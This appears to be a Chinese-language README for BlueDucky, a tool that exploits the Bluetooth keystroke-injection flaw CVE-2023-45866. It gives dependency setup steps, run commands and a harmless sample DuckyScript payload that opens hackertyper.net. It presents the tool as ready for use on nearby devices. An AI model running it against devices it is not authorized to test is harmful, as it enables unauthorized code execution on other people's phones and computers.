感谢 HackNexus 的所有人。一定要来加入我们的语音聊天! https://discord.gg/HackNexus
注意:除了树莓派外,我无法在其他笔记本或其他设备上运行此程序进行测试。因此,如果遇到任何问题,你们需要互相解决,因为我没有多余的资金购买适配器。
🚨 CVE-2023-45866 - BlueDucky 实现(使用 DuckyScript)
🔓 未认证对等连接导致代码执行(使用 HID 键盘)
BlueDucky 是一个强大的工具,用于利用蓝牙设备中的漏洞。通过运行此脚本,你可以:
我已在树莓派 4 上使用默认蓝牙模块成功运行此程序。它适用于多种手机,但有一个有趣的例外:新西兰品牌 Vodafone。
# 更新 apt
sudo apt-get update
sudo apt-get -y upgrade
# 从 apt 安装依赖
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
git gcc python3-pip python3-setuptools \
python3-pydbus
# 从源码安装 pybluez
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# 从 bluez 源码构建 bdaddr
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
# 更新 pacman 及软件包
sudo pacman -Syyu
# 安装依赖
# 由于 arch 不分离库包:libbluetooth-dev 包含在 bluez 包中
sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \
python-setuptools python-pydbus python-dbus
git gcc python-pip \
# 从源码安装 pybluez
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# 从 bluez 源码构建 bdaddr
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py
或者,
pip3 install -r requirements.txt
🚧 正在进行中:
REM 有效负载的标题
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
REM 打开一个私有浏览器进入 hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER 等于 CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300